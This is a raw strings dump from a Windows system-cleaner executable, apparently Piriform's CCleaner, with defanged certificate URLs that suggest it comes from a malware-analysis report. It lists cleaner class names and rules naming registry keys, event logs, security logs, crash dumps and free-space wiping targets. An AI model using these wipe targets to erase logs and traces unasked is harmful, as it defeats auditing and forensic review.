.?AV?$CKeyboardFocusImpl@VCCustomComboBox@Piriform@@@Piriform@@
.?AV?$CKeyboardFocusImpl@VCCheckListViewCtrlEx@Piriform@@@Piriform@@
.?AV?$bind_t@XV?$mf1@XV?$CCookiesEventsExAsync@VCIntelligentCookieScan@@UICookiesEventsEx@Piriform@@@Piriform@@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@_mfi@boost@@V?$list2@V?$value@PAV?$CCookiesEventsExAsync@VCIntelligentCookieScan@@UICookiesEventsEx@Piriform@@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@@_bi@3@@_bi@boost@@
.?AV?$CKeyboardFocusImpl@VCRegistryListViewImpl@Piriform@@@Piriform@@
.?AV?$bind_t@XV?$mf1@XV?$ICookiesEventsExAsyncImpl@VCOptionsCookiesCtrl@@UICookiesEventsEx@Piriform@@@Piriform@@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@_mfi@boost@@V?$list2@V?$value@PAV?$ICookiesEventsExAsyncImpl@VCOptionsCookiesCtrl@@UICookiesEventsEx@Piriform@@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@@_bi@3@@_bi@boost@@
.?AV?$CKeyboardFocusImpl@VCStartUpListViewImpl@@@Piriform@@
.?AV?$CKeyboardFocusImpl@VCDuplicateListViewImpl@Piriform@@@Piriform@@
.?AV?$bind_t@XV?$mf1@XV?$IEventsExImpl@VCToolsDuplicateCtrl@@UIDuplicateEvents@Piriform@@@Piriform@@PB_W@_mfi@boost@@V?$list2@V?$value@PAV?$IDuplicateEventsAsyncImpl@VCToolsDuplicateCtrl@@UIDuplicateEvents@Piriform@@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XV?$IDuplicateEventsExImpl@VCToolsDuplicateCtrl@@UIDuplicateEvents@Piriform@@@Piriform@@PB_W@_mfi@boost@@V?$list2@V?$value@PAV?$IDuplicateEventsAsyncImpl@VCToolsDuplicateCtrl@@UIDuplicateEvents@Piriform@@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@@_bi@3@@_bi@boost@@
.?AV?$CKeyboardFocusImpl@VCSystemAnalyzerFilesListViewImpl@Piriform@@@Piriform@@
.?AV?$bind_t@XV?$mf1@XV?$IEventsExImpl@VCToolsSystemAnalyzerCtrl@@UISystemAnalyzerEvents@Piriform@@@Piriform@@PB_W@_mfi@boost@@V?$list2@V?$value@PAV?$ISystemAnalyzerEventsAsyncImpl@VCToolsSystemAnalyzerCtrl@@UISystemAnalyzerEvents@Piriform@@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@@_bi@3@@_bi@boost@@
.?AV?$CKeyboardFocusImpl@VCSystemRestoreListView@@@Piriform@@
.?AV?$CKeyboardFocusImpl@VCUninstallListViewImpl@@@Piriform@@
.?AUIWebControlEvents@@
.?AU?$forward_to_logger@U?$return_str@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@V?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@ostream_like@gather@logging@boost@@U?$ts_write@U?$format_write@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@U?$simple@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@@format_and_write@34@U?$simple@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@@msg_route@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@Vmutex_win32@threading@34@@array@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@destination@logging@boost@@Vmutex_win32@threading@34@@array@34@@writer@logging@boost@@@writer@45@@logging@boost@@
.?AU?$common_base_holder@U?$return_str@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@V?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@ostream_like@gather@logging@boost@@U?$ts_write@U?$format_write@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@U?$simple@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@@format_and_write@34@U?$simple@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@@msg_route@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@Vmutex_win32@threading@34@@array@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@destination@logging@boost@@Vmutex_win32@threading@34@@array@34@@writer@logging@boost@@@writer@45@@detail@logging@boost@@
.?AU?$logger_base@U?$return_str@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@V?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@ostream_like@gather@logging@boost@@U?$ts_write@U?$format_write@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@U?$simple@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@@format_and_write@34@U?$simple@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@@msg_route@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@Vmutex_win32@threading@34@@array@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@destination@logging@boost@@Vmutex_win32@threading@34@@array@34@@writer@logging@boost@@@writer@45@Uoverride@45@@logging@boost@@
.?AU?$logger@U?$return_str@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@V?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@ostream_like@gather@logging@boost@@U?$ts_write@U?$format_write@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@U?$simple@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@@format_and_write@34@U?$simple@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@@msg_route@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@Vmutex_win32@threading@34@@array@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@destination@logging@boost@@Vmutex_win32@threading@34@@array@34@@writer@logging@boost@@@writer@45@@logging@boost@@
.?AVHexEncoder@CryptoPP@@
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.PB_W
.?AV?$IOperationImpl@UISecureDelete2@IO@Piriform@@@Piriform@@
.?AV?$sp_counted_impl_p@UWebNavigate@Shell@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCWindowsServicesRule@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerPreviousWindowsInstallation@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerWindowsEventLogs@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerNetworkPasswords@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeLastDownloadLocation@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeFlashCookies@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeCompactDatabases@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeSession@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeSavedPasswords@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeFormHistory@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeDownload@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeHistory@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeCookies@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeCache@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerSafariSavedPasswords@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$RuleBase@VCCleanerChromeCompactDatabases@Piriform@@@Opera@Rules@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$RuleBase@VCCleanerChromeFormHistory@Piriform@@@Opera@Rules@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$RuleBase@VCCleanerChromeDownload@Piriform@@@Opera@Rules@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$RuleBase@VCCleanerChromeCookies@Piriform@@@Opera@Rules@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$RuleBase@VCCleanerChromeHistory@Piriform@@@Opera@Rules@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaSession@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaRecentlyTypedUrls@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaLastDownloadLocation@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaSavedPasswords@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaWebsiteIcons@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaCookies@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaHistory@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaCache@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaSitePreferences@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaCompactDatabases@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaGoogleToolbar@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaSession@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaSavedPasswords@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaFormHistory@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaCookies@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaDownload@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaHistory@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaCache@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerIESavedPasswords@Piriform@@@detail@boost@@
.?AUISQLiteEvents@Piriform@@
.?AVCCleanerChromeCookies@Piriform@@
.?AV?$RuleBase@VCCleanerChromeCookies@Piriform@@@Opera@Rules@Piriform@@
.?AVCCleanerChromeCompactDatabases@Piriform@@
.?AV?$RuleBase@VCCleanerChromeCompactDatabases@Piriform@@@Opera@Rules@Piriform@@
.?AVCCleanerChromeFormHistory@Piriform@@
.?AV?$RuleBase@VCCleanerChromeFormHistory@Piriform@@@Opera@Rules@Piriform@@
.?AVCCleanerChromeDownload@Piriform@@
.?AV?$RuleBase@VCCleanerChromeDownload@Piriform@@@Opera@Rules@Piriform@@
.?AVCCleanerChromeHistory@Piriform@@
.?AV?$RuleBase@VCCleanerChromeHistory@Piriform@@@Opera@Rules@Piriform@@
.?AV?$sp_counted_impl_p@VCppSQLite3DB@@@detail@boost@@
.?AVCppSQLite3Exception@@
.?AV?$sp_counted_impl_p@URuleKeyInfo@Piriform@@@detail@boost@@
.?AVCRegKey@ATL@@
.?AVCRegKeyEx@Registry@Piriform@@
.?AV?$sp_counted_impl_p@VCOperaStartUpManager@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCChromeStartUpManager@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCMozillaStartUpManager@Piriform@@@detail@boost@@
.?AVCEnumRegKey@Registry@Piriform@@
.?AV?$sp_counted_impl_p@VCOperaSuperCookies@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCWindowsEventManager@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCOperaOfflineCacheCookies@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCMozillaOfflineCacheCookies@Piriform@@@detail@boost@@
.?AVCCleanerPreviousWindowsInstallation@Piriform@@
.?AVCCleanerSafariSavedPasswords@Piriform@@
.?AVCCleanerMozillaCompactDatabases@Piriform@@
.?AVCCleanerWindowsEventLogs@Piriform@@
.?AVCCleanerNetworkPasswords@Piriform@@
.?AVCCleanerChromeFlashCookies@Piriform@@
.?AVCCleanerChromeSession@Piriform@@
.?AVCCleanerChromeSavedPasswords@Piriform@@
.?AVCCleanerChromeLastDownloadLocation@Piriform@@
.?AVCCleanerChromeCache@Piriform@@
.?AVCCleanerMozillaCache@Piriform@@
.?AVCCleanerMozillaCacheBase@Piriform@@
.?AVCCleanerIESavedPasswords@Piriform@@
.?AVCCleanerOperaCookies@Piriform@@
.?AVCCleanerOperaWebsiteIcons@Piriform@@
.?AVCCleanerOperaSavedPasswords@Piriform@@
.?AVCCleanerOperaRecentlyTypedUrls@Piriform@@
.?AVCCleanerOperaLastDownloadLocation@Piriform@@
.?AVCCleanerOperaSession@Piriform@@
.?AVCCleanerOperaHistory@Piriform@@
.?AVCCleanerOperaCache@Piriform@@
.?AVCCleanerMozillaSitePreferences@Piriform@@
.?AVCCleanerMozillaGoogleToolbar@Piriform@@
.?AVCCleanerMozillaSession@Piriform@@
.?AVCCleanerMozillaSavedPasswords@Piriform@@
.?AVCCleanerMozillaFormHistory@Piriform@@
.?AVCCleanerMozillaCookies@Piriform@@
.?AVCCleanerMozillaDownload@Piriform@@
.?AVCCleanerMozillaHistory@Piriform@@
.?AVCWindowsServicesRule@Piriform@@
.?AV?$sp_counted_impl_p@VCppSQLite3Query@@@detail@boost@@
.?AVCChromeStorageDatabases@Piriform@@
.?AVCChromeSuperCookies@Piriform@@
.?AVCChromeCookies@Piriform@@
.?AV?$sp_counted_impl_p@UOperaOfflineCacheCookieInfo@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@UOperaSuperCookieInfo@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@UDomainEntry@COperaCookies@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VTag@Opera@Piriform@@@detail@boost@@
.?AVCOperaOfflineCacheCookies@Piriform@@
.?AVCOperaSuperCookies@Piriform@@
.?AVCOperaCookies@Piriform@@
.?AUIOperaCookies@Piriform@@
.?AUIOperaCookiesEnumerator@Piriform@@
.?AV?$sp_counted_impl_p@UMozillaCacheInfo@Piriform@@@detail@boost@@
.?AUIMozillaCacheEvents@Piriform@@
.?AVCMozillaOfflineCacheCookies@Piriform@@
.?AVCMozillaIndexedDB@Piriform@@
.?AVCMozillaCookies@Piriform@@
.?AUIMozillaCacheManager@Piriform@@
.?AV?$sp_counted_impl_p@VCMozillaPlugins@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCMozillaExtensions@Piriform@@@detail@boost@@
.?AVCMozillaStartUpManager@Piriform@@
.?AV?$sp_counted_impl_p@VCChromePlugins@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCChromeAddOns@Piriform@@@detail@boost@@
.?AVCChromeStartUpManager@Piriform@@
.?AVCOperaStartUpManager@Piriform@@
.?AVCOperaToolbar@Piriform@@
.?AVCOperaPersistentResources@Piriform@@
.?AVCOperaBookmarks@Piriform@@
.?AVCOperaDatabaseBookmarksProvider@Piriform@@
.?AVCWindowsEventManager@Piriform@@
.?AUIWindowsEventManager@Piriform@@
.?AV?$sp_counted_impl_p@VCOperaDatabaseBookmarksProvider@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCChromeJSONBookmarksProvider@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VPrefsFile@Mozilla@Piriform@@@detail@boost@@
.?AVCMozillaExtensions@Piriform@@
.?AV?$sp_counted_impl_p@VPluginFile@CMozillaPlugins@Piriform@@@detail@boost@@
.?AVCMozillaPlugins@Piriform@@
.?AVCChromeAddOns@Piriform@@
.?AVCChromePlugins@Piriform@@
.?AVCChromeJSONBookmarksProvider@Piriform@@
.?AV?$CKeyboardFocusImpl@VCCheckComboBox@@@Piriform@@
.?AV?$CForwardedKeysEditT@VCWindow@ATL@@@@
.?AVCppSQLite3DB@@
.?AVCppSQLite3Statement@@
.?AVCppSQLite3Query@@
.?AV?$VariableKeyLength@$0BA@$03$0DI@$00$03$0A@@CryptoPP@@
.?AVSimpleKeyingInterface@CryptoPP@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@UBlowfish_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@UBlowfish_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.PAVRandomNumberGenerator@CryptoPP@@
.?AUIActivationExEvents@Piriform@@
.?AV?$bind_t@XV?$mf2@XV?$IAutoUpdateEventsAsyncImpl@VCAutoUpdateEventsMarshaller@Piriform@@UIUpdateEvents@2@@Piriform@@ABV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@_N@_mfi@boost@@V?$list3@V?$value@PAV?$IAutoUpdateEventsAsyncImpl@VCAutoUpdateEventsMarshaller@Piriform@@UIUpdateEvents@2@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@V?$value@_N@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XV?$IAutoUpdateEventsAsyncImpl@VCAutoUpdateEventsMarshaller@Piriform@@UIUpdateEvents@2@@Piriform@@ABV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@_mfi@boost@@V?$list2@V?$value@PAV?$IAutoUpdateEventsAsyncImpl@VCAutoUpdateEventsMarshaller@Piriform@@UIUpdateEvents@2@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@@_bi@3@@_bi@boost@@
.?AVIActivationExEventsImpl@Piriform@@
.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@
.?AVInvalidKeyLength@CryptoPP@@
.PAV?$basic_istream@DU?$char_traits@D@std@@@std@@
.PAV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.?AUAMFUnsupportedItem@SolApi@@
.?AV?$sp_counted_impl_pd@PAUAMFUnsupportedItem@SolApi@@V?$sp_ms_deleter@UAMFUnsupportedItem@SolApi@@@detail@boost@@@detail@boost@@
.?AV?$sp_ms_deleter@UAMFUnsupportedItem@SolApi@@@detail@boost@@
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
<VeriSign Class 3 Public Primary Certification Authority - G50
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
; 3002 = Windows Explorer
SpecialKey1=N_INT_TEMP
SpecialKey1=N_INT_HISTORY
RegKey1=HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
SpecialKey1=N_INT_COOKIES
[Recently Typed URLs]
RegKey1=HKCU\Software\Microsoft\Internet Explorer\TypedURLs
RegKey2=HKCU\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU
RegKey3=HKCU\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU
[Delete Index.dat files]
SpecialKey1=N_INT_INDEXDAT
RegKey1=HKCU\Software\Microsoft\Internet Explorer|Download Directory
RegKey2=HKCU\Software\Microsoft\Internet Explorer\Main|Save Directory
SpecialKey1=N_INT_LAST_DOWNLOAD_LOCATION
SpecialKey1=N_INT_AUTOCOMPLETE
[Saved Passwords]
SpecialKey1=N_INT_PASSWORD
SpecialKey1=N_EX_RECENTDOCS
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
RegKey1=HKCU\Software\Microsoft\Search Assistant\ACMru
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32
RegKey2=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FindComputerMRU
RegKey3=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\PrnPortsMRU
RegKey4=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU
RegKey5=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComputerDescriptions
RegKey6=HKLM\Software\Microsoft\Direct3D\MostRecentApplication|Name
RegKey7=HKCU\Software\Microsoft\Direct3D\MostRecentApplication|Name
RegKey8=HKLM\Software\Microsoft\DirectDraw\MostRecentApplication
RegKey9=HKCU\Software\Microsoft\DirectInput\MostRecentApplication|Id
RegKey10=HKCU\Software\Microsoft\DirectInput\MostRecentApplication|Name
RegKey11=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery
RegKey12=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths
RegKey13=HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Regedit|LastKey
RegKey14=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Wallpaper\MRU
RegKey15=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Wallpapers\Images
SpecialKey1=N_TEMP_RECYCLEBIN
SpecialKey1=N_TEMP_DIRS
SpecialKey1=N_TEMP_CLIPBOARD
FileKey1=%windir%|memory.dmp
FileKey2=%windir%\MiniDump|*.dmp
FileKey3=%LocalAppData%\CrashDumps|*.dmp
FileKey1=%SystemDrive%|File*.chk
[Windows Log Files]
FileKey1=%SystemDirectory%\wbem\Logs|*.log
FileKey2=%SystemDirectory%\wbem\Logs|*.lo_
FileKey3=%windir%|*.log
FileKey4=%windir%|*.bak
FileKey5=%windir%|*log.txt
FileKey6=%commonappdata%\Microsoft\Dr Watson|*.log
FileKey7=%commonappdata%\Microsoft\Dr Watson|*.dmp
FileKey8=%windir%\Debug|*.log
FileKey9=%windir%\Debug\UserMode|*.log
FileKey10=%windir%\Debug\UserMode|*.bak
FileKey11=%windir%|SchedLgU.txt
FileKey12=%windir%\security\logs|*.log
FileKey13=%windir%\security\logs|*.old
FileKey14=%windir%\SoftwareDistribution|*.log
FileKey15=%windir%\Logs|*.log|RECURSE
FileKey16=%windir%\ServiceProfiles\LocalService\AppData|*.Log|RECURSE
FileKey17=%windir%\ServiceProfiles\NetworkService\AppData|*.Log|RECURSE
FileKey18=%LocalAppData%\Microsoft\Windows|*.log|RECURSE
FileKey19=%AppData%\Microsoft\Windows|*.log|RECURSE
FileKey20=%windir%\Microsoft.NET|*.log|RECURSE
FileKey21=%LocalAppData%\MigWiz|*.log
FileKey22=%LocalAppData%\MigWiz|*.xml
FileKey23=%windir%\inf|setupapi.app.log
FileKey24=%windir%\inf|setupapi.dev.log
FileKey25=%windir%\Panther\UnattendGC|setupact.log
FileKey26=%windir%\Panther\UnattendGC|setuperr.log
FileKey27=%windir%\Panther|setupact.log
FileKey28=%windir%\Panther|setuperr.log
FileKey29=%WinDir%\ModemLogs|*.txt
FileKey30=%WinDir%\Performance\WinSAT|winsat.log
FileKey31=%LocalAppData%\Microsoft\CLR_v4.0\*|*.log
FileKey32=%LocalAppData%\Microsoft\CLR_v4.0_32\*|*.log
FileKey33=%SystemDirectory%\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\*|*.log
FileKey34=%SystemDirectory%\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\*|*.log
[Windows Error Reporting]
FileKey1=%ALLUSERSPROFILE%\Microsoft\Windows\WER\ReportArchive|*.*|RECURSE
FileKey2=%ALLUSERSPROFILE%\Microsoft\Windows\WER\ReportQueue|*.*|RECURSE
FileKey3=%USERPROFILE%\AppData\Local\Microsoft\Windows\WER\ReportArchive|*.*|RECURSE
FileKey4=%USERPROFILE%\AppData\Local\Microsoft\Windows\WER\ReportQueue|*.*|RECURSE
FileKey5=%LocalAppData%\ElevatedDiagnostics|*.*|REMOVESELF
RegKey1=HKCU\Software\Microsoft\Windows\Windows Error Reporting\Debug|StoreLocation
RegKey2=HKLM\Software\Microsoft\Windows\Windows Error Reporting\Debug|StoreLocation
SpecialKey1=N_EX_DNS_CACHE
FileKey1=%WinDir%\System32|FNTCACHE.DAT
FileKey2=%LocalAppData%|GDIPFONTCACHEV1.DAT
FileKey3=%windir%\ServiceProfiles\LocalService\AppData\Local|FontCache*.dat
[Windows Event Logs]
SpecialKey1=N_EX_WINDOWS_EVENT_LOGS
Detect=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\OptimalLayout
SpecialKey1=N_INT_PREFETCH
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder
Detect=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify|IconStreams
RegKey2=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify|PastIconsStream
RegKey3=HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify|IconStreams
RegKey4=HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify|PastIconsStream
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StreamMRU
RegKey2=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams
SpecialKey1=N_EX_ENVIRONMENT_PATH
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count
RegKey2=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count
RegKey3=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
RegKey4=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count
FileKey1=%SystemDirectory%\LogFiles|*.*|RECURSE
FileKey2=%SystemDrive%\inetpub\logs\LogFiles|*.*|RECURSE
ExcludeKey1=PATH|%SystemDirectory%\LogFiles\|SCM
SpecialKey1=N_EX_HOTFIX
[Old Windows Installation]
DetectFile1=%SystemDrive%\Windows.old*
DetectFile2=%SystemDrive%\$WINDOWS.~BT
DetectFile3=%SystemDrive%\$WINDOWS.~Q
DetectFile4=%SystemDrive%\$INPLACE.~TR
SpecialKey1=N_EX_PREVIOUS_WINDOWS_INSTALLATION
SpecialKey1=N_EX_CUSTOMFOLDERS
SpecialKey1=F_STARTMENU
SpecialKey1=F_DESKTOP
SpecialKey1=N_EX_THUMBNAIL_CACHE
FileKey1=%LocalAppData%\Microsoft\Windows\Explorer|thumbcache_*.db
FileKey2=%LocalAppData%\Microsoft\Windows\Explorer\ThumbCacheToDelete|thm*.tmp
SpecialKey1=N_EX_WIPE_MFT_FREE_SPACE
SpecialKey2=N_EX_WIPEFREESPACE
